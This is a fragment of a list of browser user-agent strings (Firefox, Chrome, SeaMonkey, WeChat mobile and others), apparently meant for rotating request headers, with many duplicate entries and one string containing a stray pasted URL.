"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
